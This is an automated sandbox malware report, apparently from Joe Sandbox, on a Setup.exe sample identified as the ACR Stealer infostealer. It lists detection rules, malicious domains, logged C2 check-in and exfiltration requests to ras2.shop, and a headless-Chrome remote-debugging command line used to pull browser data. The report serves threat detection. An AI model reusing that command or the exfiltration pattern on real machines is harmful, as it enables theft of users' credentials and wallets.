Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1581482
MD5: f18fa7132a5eda29041fdd8ae85363db
SHA1: 4de6de8445b5dc6897461b684da74df7e9673f78
SHA256: 543c81da09d6669ddf5fbb2d6c3889d7dabfd166d3f726349c30a51c542a2f50
Tags: exe, user-aachum
Infos:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: F18FA7132A5EDA29041FDD8AE85363DB)
    • chrome.exe (PID: 1368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2140 --field-trial-handle=2028,i,5279315519537041474,755320844484096508,262144 --disable-features=PaintHolding /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • WerFault.exe (PID: 7556 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 2236 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7244 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 1264 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0xa0111:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Setup.exe PID: 6592 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: Setup.exe PID: 6592 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

      Source | Rule | Description | Author | Strings
      0.2.Setup.exe.2d223e4.0.unpack | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
      • 0x9ab2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      0.2.Setup.exe.2d223e4.0.unpack | infostealer_win_acrstealer_str | Finds ACR Stealer standalone samples based on specific strings. | Sekoia.io
      • 0x85430:$str01: ref.txt
      • 0x85eac:$str02: Wininet.dll
      • 0x85f28:$str03: Content-Type: application/octet-stream; boundary=----
      • 0x85f70:$str04: POST
      • 0x84e88:$str05: os_c
      • 0x84e90:$str06: en_k
      • 0x85490:$str07: MyApp/1.0
      • 0x85200:$str08: /Up/b
      • 0x85998:$str10: /ujs/
      • 0x85bdc:$str11: /Up/
      • 0x859cc:$str12: ostr
      • 0x859f8:$str12: ostr
      • 0x85a24:$str12: ostr
      • 0x85a3c:$str12: ostr
      • 0x859d4:$str13: brCH
      • 0x85a04:$str13: brCH
      • 0x859e4:$str14: brGk
      • 0x84df0:$str15: https://steamcommunity.com/profiles/
      • 0x85308:$str15: https://steamcommunity.com/profiles/
      • 0x85370:$str15: https://steamcommunity.com/profiles/
      • 0x85888:$str15: https://steamcommunity.com/profiles/
      0.2.Setup.exe.2d223e4.0.raw.unpack | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
      • 0x9dd2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      0.2.Setup.exe.2d223e4.0.raw.unpack | infostealer_win_acrstealer_str | Finds ACR Stealer standalone samples based on specific strings. | Sekoia.io
      • 0x86030:$str01: ref.txt
      • 0x86aac:$str02: Wininet.dll
      • 0x86b28:$str03: Content-Type: application/octet-stream; boundary=----
      • 0x86b70:$str04: POST
      • 0x85a88:$str05: os_c
      • 0x85a90:$str06: en_k
      • 0x86090:$str07: MyApp/1.0
      • 0x85e00:$str08: /Up/b
      • 0x86598:$str10: /ujs/
      • 0x867dc:$str11: /Up/
      • 0x865cc:$str12: ostr
      • 0x865f8:$str12: ostr
      • 0x86624:$str12: ostr
      • 0x8663c:$str12: ostr
      • 0x865d4:$str13: brCH
      • 0x86604:$str13: brCH
      • 0x865e4:$str14: brGk
      • 0x859f0:$str15: https://steamcommunity.com/profiles/
      • 0x85f08:$str15: https://steamcommunity.com/profiles/
      • 0x85f70:$str15: https://steamcommunity.com/profiles/
      • 0x86488:$str15: https://steamcommunity.com/profiles/

      System Summary

      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6592, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", ProcessId: 1368, ProcessName: chrome.exe
      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6592, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", ProcessId: 1368, ProcessName: chrome.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-27T21:27:38.720224+0100 | 2052674 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.2.114 | 443 | TCP
      2024-12-27T21:27:40.836719+0100 | 2052675 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.2.114 | 443 | TCP
      2024-12-27T21:27:36.583256+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 104.121.10.34 | 443 | TCP
      2024-12-27T21:27:38.720224+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 104.21.2.114 | 443 | TCP

      AV Detection

      Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txtmp | Avira URL Cloud: Label: malware
      Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txt | Avira URL Cloud: Label: malware
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_0317BA40 lstrlen,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,CryptUnprotectData,0_2_0317BA40
      Source: Setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: unknown | HTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 104.21.2.114:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_03182080 FindFirstFileA,FindNextFileA,Sleep,0_2_03182080
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_0317DED0 FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_0317DED0

      Networking

      Source: Network traffic | Suricata IDS: 2052675 - Severity 1 - ET MALWARE ACR Stealer Data Exfiltration Attempt M1 : 192.168.2.4:49736 -> 104.21.2.114:443
      Source: Network traffic | Suricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.4:49734 -> 104.21.2.114:443
      Source: Joe Sandbox View | IP Address: 104.121.10.34
      Source: Joe Sandbox View | IP Address: 239.255.255.250
      Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
      Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49732 -> 104.121.10.34:443
      Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49734 -> 104.21.2.114:443
      Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_0319DEB0 InternetOpenUrlA,InternetReadFile,InternetReadFile,0_2_0319DEB0
      Source: global traffic | HTTP traffic detected: GET /profiles/76561199680660089 HTTP/1.1 | User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3 | Host: steamcommunity.com | Cache-Control: no-cache
      Source: global traffic | HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1 | User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3 | Host: ras2.shop | Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;E equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000002.00000002.3542562259.00006508002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
      Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
      Source: global traffic | DNS traffic detected: DNS query: ras2.shop
      Source: global traffic | DNS traffic detected: DNS query: www.google.com
      Source: global traffic | DNS traffic detected: DNS query: apis.google.com
      Source: global traffic | DNS traffic detected: DNS query: play.google.com
      Source: unknown | HTTP traffic detected: POST /Up HTTP/1.1 | Content-Type: application/octet-stream; boundary=---- | User-Agent: MyApp/1.0 | Host: ras2.shop | Content-Length: 349 | Cache-Control: no-cache
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586;
      Source: chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
      Source: chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
      Source: chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901)
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/49013
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543119025.0000650800474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
